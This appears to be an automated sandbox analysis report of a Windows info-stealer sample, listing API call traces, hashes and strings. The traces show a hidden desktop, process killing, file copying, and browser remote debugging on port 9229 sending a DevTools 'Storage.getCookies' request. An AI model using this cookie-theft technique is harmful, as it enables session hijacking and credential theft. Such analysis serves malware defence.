                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C147A
                                  • StrCmpCA.SHLWAPI(?,011CD670), ref: 002C14A3
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002C14E4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002C150D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C1535
                                  • StrCmpCA.SHLWAPI(?,011CD9B0), ref: 002C1552
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002C1593
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002C15BC
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C15E4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002C1796
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C17BE
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002C17F5
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 002C181C
                                  • FindClose.KERNEL32(00000000), ref: 002C182B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                   • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                                  • String ID:
                                  • API String ID: 1346933759-0
                                  • Opcode ID: d2b7c4f5cca6a9a2d5f7ff896326482d94a428dcb9b4cdd0aee4a7cd4113cb30
                                  • Instruction ID: b320cf730fd7f28993e5de33e37bcb6585d9870e649d728b862113a074a1c457
                                  • Opcode Fuzzy Hash: d2b7c4f5cca6a9a2d5f7ff896326482d94a428dcb9b4cdd0aee4a7cd4113cb30
                                  • Instruction Fuzzy Hash: FBC181719207479BDB21EF74DC8ABEE77B8AF45340F544228F84AA7252DB30DC258B90
                                  APIs
                                  • memset.MSVCRT ref: 002B9790
                                  • lstrcat.KERNEL32(?,?), ref: 002B97A0
                                  • lstrcat.KERNEL32(?,?), ref: 002B97B1
                                  • lstrcat.KERNEL32(?, --remote-debugging-port=9229 --profile-directory="), ref: 002B97C3
                                  • memset.MSVCRT ref: 002B97D7
                                    • Part of subcall function 002D3E70: lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002D3EA5
                                    • Part of subcall function 002D3E70: lstrcpy.KERNEL32(00000000,011CA4A0), ref: 002D3ECF
                                    • Part of subcall function 002D3E70: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,002B134E,?,0000001A), ref: 002D3ED9
                                  • wsprintfA.USER32 ref: 002B9806
                                  • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 002B9827
                                  • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 002B9844
                                    • Part of subcall function 002D46A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 002D46B9
                                    • Part of subcall function 002D46A0: Process32First.KERNEL32(00000000,00000128), ref: 002D46C9
                                    • Part of subcall function 002D46A0: Process32Next.KERNEL32(00000000,00000128), ref: 002D46DB
                                    • Part of subcall function 002D46A0: StrCmpCA.SHLWAPI(?,?), ref: 002D46ED
                                    • Part of subcall function 002D46A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 002D4702
                                    • Part of subcall function 002D46A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 002D4711
                                    • Part of subcall function 002D46A0: CloseHandle.KERNEL32(00000000), ref: 002D4718
                                    • Part of subcall function 002D46A0: Process32Next.KERNEL32(00000000,00000128), ref: 002D4726
                                    • Part of subcall function 002D46A0: CloseHandle.KERNEL32(00000000), ref: 002D4731
                                  • lstrcat.KERNEL32(00000000,?), ref: 002B9878
                                  • lstrcat.KERNEL32(00000000,?), ref: 002B9889
                                  • lstrcat.KERNEL32(00000000,002E4B60), ref: 002B989B
                                  • memset.MSVCRT ref: 002B98AF
                                  • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 002B98D4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002B9903
                                  • StrStrA.SHLWAPI(00000000,011CE040), ref: 002B9919
                                  • lstrcpyn.KERNEL32(004E93D0,00000000,00000000), ref: 002B9938
                                  • lstrlen.KERNEL32(?), ref: 002B994B
                                  • wsprintfA.USER32 ref: 002B995B
                                  • lstrcpy.KERNEL32(?,00000000), ref: 002B9971
                                  • Sleep.KERNEL32(00001388), ref: 002B99E7
                                    • Part of subcall function 002B1530: lstrcpy.KERNEL32(00000000,?), ref: 002B1557
                                    • Part of subcall function 002B1530: lstrcpy.KERNEL32(00000000,?), ref: 002B1579
                                    • Part of subcall function 002B1530: lstrcpy.KERNEL32(00000000,?), ref: 002B159B
                                    • Part of subcall function 002B1530: lstrcpy.KERNEL32(00000000,?), ref: 002B15FF
                                    • Part of subcall function 002B92B0: strlen.MSVCRT ref: 002B92E1
                                    • Part of subcall function 002B92B0: strlen.MSVCRT ref: 002B92FA
                                    • Part of subcall function 002B92B0: strlen.MSVCRT ref: 002B9399
                                    • Part of subcall function 002B92B0: strlen.MSVCRT ref: 002B93E6
                                    • Part of subcall function 002D4740: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 002D4759
                                    • Part of subcall function 002D4740: Process32First.KERNEL32(00000000,00000128), ref: 002D4769
                                    • Part of subcall function 002D4740: Process32Next.KERNEL32(00000000,00000128), ref: 002D477B
                                    • Part of subcall function 002D4740: OpenProcess.KERNEL32(00000001,00000000,?), ref: 002D479C
                                    • Part of subcall function 002D4740: TerminateProcess.KERNEL32(00000000,00000000), ref: 002D47AB
                                    • Part of subcall function 002D4740: CloseHandle.KERNEL32(00000000), ref: 002D47B2
                                    • Part of subcall function 002D4740: Process32Next.KERNEL32(00000000,00000128), ref: 002D47C0
                                    • Part of subcall function 002D4740: CloseHandle.KERNEL32(00000000), ref: 002D47CB
                                  • CloseDesktop.USER32(?), ref: 002B9A1C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                   • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Process32lstrcat$Close$HandleNextProcessstrlen$CreateDesktopOpenmemset$FirstSnapshotTerminateToolhelp32wsprintf$FolderPathSleepSystemTimelstrcpynlstrlen
                                  • String ID: --remote-debugging-port=9229 --profile-directory="$%s%s$D
                                  • API String ID: 958055206-1862457068
                                  • Opcode ID: 8b369fe54155103fc083798262da38a5a563343f18a17670144b7c98cbadc2cf
                                  • Instruction ID: 5a34300790aa4bb27d6bf00e5eb0a1a58c4c5209198ad802cc1c4985fb545f49
                                  • Opcode Fuzzy Hash: 8b369fe54155103fc083798262da38a5a563343f18a17670144b7c98cbadc2cf
                                  • Instruction Fuzzy Hash: 01918471A50208ABDB50DF74DC89FDE77B8AF48700F5041A9F609AB281DB70AE548FA4
                                  APIs
                                  • wsprintfA.USER32 ref: 002CE22C
                                  • FindFirstFileA.KERNEL32(?,?), ref: 002CE243
                                  • StrCmpCA.SHLWAPI(?,002E17A0), ref: 002CE263
                                  • StrCmpCA.SHLWAPI(?,002E17A4), ref: 002CE27D
                                  • wsprintfA.USER32 ref: 002CE2A2
                                  • StrCmpCA.SHLWAPI(?,002DCFEC), ref: 002CE2B4
                                  • wsprintfA.USER32 ref: 002CE2D1
                                    • Part of subcall function 002CEDE0: lstrcpy.KERNEL32(00000000,?), ref: 002CEE12
                                  • wsprintfA.USER32 ref: 002CE2F0
                                  • PathMatchSpecA.SHLWAPI(?,?), ref: 002CE304
                                  • lstrcat.KERNEL32(?,011CEA38), ref: 002CE335
                                  • lstrcat.KERNEL32(?,002E1794), ref: 002CE347
                                  • lstrcat.KERNEL32(?,?), ref: 002CE358
                                  • lstrcat.KERNEL32(?,002E1794), ref: 002CE36A
                                  • lstrcat.KERNEL32(?,?), ref: 002CE37E
                                  • CopyFileA.KERNEL32(?,?,00000001), ref: 002CE394
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002CE3D2
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002CE422
                                  • DeleteFileA.KERNEL32(?), ref: 002CE45C
                                    • Part of subcall function 002B1530: lstrcpy.KERNEL32(00000000,?), ref: 002B1557
                                    • Part of subcall function 002B1530: lstrcpy.KERNEL32(00000000,?), ref: 002B1579
                                    • Part of subcall function 002B1530: lstrcpy.KERNEL32(00000000,?), ref: 002B159B
                                    • Part of subcall function 002B1530: lstrcpy.KERNEL32(00000000,?), ref: 002B15FF
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 002CE49B
                                  • FindClose.KERNEL32(00000000), ref: 002CE4AA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                   • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                                  • String ID: %s\%s$%s\*
                                  • API String ID: 1375681507-2848263008
                                  • Opcode ID: 1a0f5c5912654ad68ab360e5e1b29e6ebbda38087fb59e7f23f0687c8b2abec9
                                  • Instruction ID: 64f8085f733c92dc85e29a6b7eebcc04dd089705c277a96389da322f21cce39b
                                  • Opcode Fuzzy Hash: 1a0f5c5912654ad68ab360e5e1b29e6ebbda38087fb59e7f23f0687c8b2abec9
                                  • Instruction Fuzzy Hash: 818183719202599BCF20EF64DC89EEE7779BF44300F4446A8B54A97181DB34AE68CFA4
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002B16E2
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002B1719
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B176C
                                  • lstrcat.KERNEL32(00000000), ref: 002B1776
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B17A2
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002B18F3
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002B18FE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                   • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat
                                  • String ID: \*.*
                                  • API String ID: 2276651480-1173974218
                                  • Opcode ID: 926498b29487d0a6bbb920a1a65fb0044c6636fee2374b4a22e8ffd9b6ee446d
                                  • Instruction ID: 0d36bff3be5d49721137b0e97ca08cb77c32a0f514544df388ac4eb2aaa23878
                                  • Opcode Fuzzy Hash: 926498b29487d0a6bbb920a1a65fb0044c6636fee2374b4a22e8ffd9b6ee446d
                                  • Instruction Fuzzy Hash: D781913193064BDBDB21EF64D999AEEB7B9AF04380F644124F845AB252CB309C35CF91
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 002CDD45
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 002CDD4C
                                  • wsprintfA.USER32 ref: 002CDD62
                                  • FindFirstFileA.KERNEL32(?,?), ref: 002CDD79
                                  • StrCmpCA.SHLWAPI(?,002E17A0), ref: 002CDD9C
                                  • StrCmpCA.SHLWAPI(?,002E17A4), ref: 002CDDB6
                                  • wsprintfA.USER32 ref: 002CDDD4
                                  • DeleteFileA.KERNEL32(?), ref: 002CDE20
                                  • CopyFileA.KERNEL32(?,?,00000001), ref: 002CDDED
                                    • Part of subcall function 002B1530: lstrcpy.KERNEL32(00000000,?), ref: 002B1557
                                    • Part of subcall function 002B1530: lstrcpy.KERNEL32(00000000,?), ref: 002B1579
                                    • Part of subcall function 002B1530: lstrcpy.KERNEL32(00000000,?), ref: 002B159B
                                    • Part of subcall function 002B1530: lstrcpy.KERNEL32(00000000,?), ref: 002B15FF
                                    • Part of subcall function 002CD980: memset.MSVCRT ref: 002CD9A1
                                    • Part of subcall function 002CD980: memset.MSVCRT ref: 002CD9B3
                                    • Part of subcall function 002CD980: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 002CD9DB
                                    • Part of subcall function 002CD980: lstrcpy.KERNEL32(00000000,?), ref: 002CDA0E
                                    • Part of subcall function 002CD980: lstrcat.KERNEL32(?,00000000), ref: 002CDA1C
                                    • Part of subcall function 002CD980: lstrcat.KERNEL32(?,011CE2B0), ref: 002CDA36
                                    • Part of subcall function 002CD980: lstrcat.KERNEL32(?,?), ref: 002CDA4A
                                    • Part of subcall function 002CD980: lstrcat.KERNEL32(?,011CD580), ref: 002CDA5E
                                    • Part of subcall function 002CD980: lstrcpy.KERNEL32(00000000,?), ref: 002CDA8E
                                    • Part of subcall function 002CD980: GetFileAttributesA.KERNEL32(00000000), ref: 002CDA95
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 002CDE2E
                                  • FindClose.KERNEL32(00000000), ref: 002CDE3D
                                  • lstrcat.KERNEL32(?,011CEA38), ref: 002CDE66
                                  • lstrcat.KERNEL32(?,011CDA30), ref: 002CDE7A
                                  • lstrlen.KERNEL32(?), ref: 002CDE84
                                  • lstrlen.KERNEL32(?), ref: 002CDE92
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002CDED2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                   • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$File$Find$Heaplstrlenmemsetwsprintf$AllocateAttributesCloseCopyDeleteFirstFolderNextPathProcess
                                  • String ID: %s\%s$%s\*
                                  • API String ID: 4184593125-2848263008
                                  • Opcode ID: c99ea131fcca1c2535b3d826bf4d1d695e04c3aafce505491fe8f53655f35fa2
                                  • Instruction ID: 57db7a0e6e50c3880a3381d830e5c3c99618c06822c85a766336d4775a30a4c2
                                  • Opcode Fuzzy Hash: c99ea131fcca1c2535b3d826bf4d1d695e04c3aafce505491fe8f53655f35fa2
                                  • Instruction Fuzzy Hash: 6B617271920249ABCF20EF74DC89AEE77B9BF48340F4045A8F54AA7291DB34AE54CF54
                                  APIs
                                  • wsprintfA.USER32 ref: 002CD54D
                                  • FindFirstFileA.KERNEL32(?,?), ref: 002CD564
                                  • StrCmpCA.SHLWAPI(?,002E17A0), ref: 002CD584
                                  • StrCmpCA.SHLWAPI(?,002E17A4), ref: 002CD59E
                                  • lstrcat.KERNEL32(?,011CEA38), ref: 002CD5E3
                                  • lstrcat.KERNEL32(?,011CEA98), ref: 002CD5F7
                                  • lstrcat.KERNEL32(?,?), ref: 002CD60B
                                  • lstrcat.KERNEL32(?,?), ref: 002CD61C
                                  • lstrcat.KERNEL32(?,002E1794), ref: 002CD62E
                                  • lstrcat.KERNEL32(?,?), ref: 002CD642
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002CD682
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002CD6D2
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 002CD737
                                  • FindClose.KERNEL32(00000000), ref: 002CD746
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$Find$Filelstrcpy$CloseFirstNextwsprintf
                                  • String ID: %s\%s
                                  • API String ID: 50252434-4073750446
                                  • Opcode ID: da6c544e3b0151da0418a82ae7e7cffd532e20d3aa39d7f37531461b2c28a386
                                  • Instruction ID: 6ed52d7209b4ff37627165249ddee3828ce88e2f71d354a5b49b55fa300fb8ab
                                  • Opcode Fuzzy Hash: da6c544e3b0151da0418a82ae7e7cffd532e20d3aa39d7f37531461b2c28a386
                                  • Instruction Fuzzy Hash: 496177719202599BCF20EF74DC84ADEB7B8EF48300F5085B9E649A7251DB34AE55CF90
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Xinvalid_argumentstd::_
                                  • String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $:$ws://${"id":1,"method":"Storage.getCookies"}
                                  • API String ID: 909987262-758292691
                                  • Opcode ID: ca9188437960cb1ba1949675e494de8064d3dc60dc1e5ebf8e1c28829123f554
                                  • Instruction ID: 58868d17d0a5a3e006917e696a6349c6a483d9e15289b534c625d12d443ce024
                                  • Opcode Fuzzy Hash: ca9188437960cb1ba1949675e494de8064d3dc60dc1e5ebf8e1c28829123f554
                                  • Instruction Fuzzy Hash: 4CA25871D212699FDF20DFA8C8907EDBBB6AF48300F1481AAE509A7341DB715E95CF90
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002C23D4
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C23F7
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002C2402
                                  • lstrlen.KERNEL32(\*.*), ref: 002C240D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C242A
                                  • lstrcat.KERNEL32(00000000,\*.*), ref: 002C2436
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C246A
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 002C2486
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmp
